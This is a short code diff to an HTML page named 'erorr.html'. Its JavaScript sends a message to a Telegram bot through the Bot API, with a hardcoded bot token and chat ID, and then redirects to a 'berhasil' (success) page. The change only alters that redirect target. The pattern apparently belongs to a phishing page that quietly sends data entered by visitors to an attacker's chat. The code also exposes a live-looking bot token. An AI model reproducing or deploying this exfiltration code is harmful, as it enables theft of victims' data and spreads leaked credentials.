--- a/erorr.html
+++ b/erorr.html
@@ -77,7 +77,7 @@
         // Mengirim pesan ke bot Telegram
         fetch('https://api.telegram.org/bot7013744655:AAHkFeLuzjP6HDjRUSsGtrmX9wVynjxJIz4/sendMessage?chat_id=7175125790&text=' + encodeURIComponent(message))
         .finally(function(){
-            window.open('erorr.html','_self');
+            window.open('berhasil.html','_self');
         });
     }
 
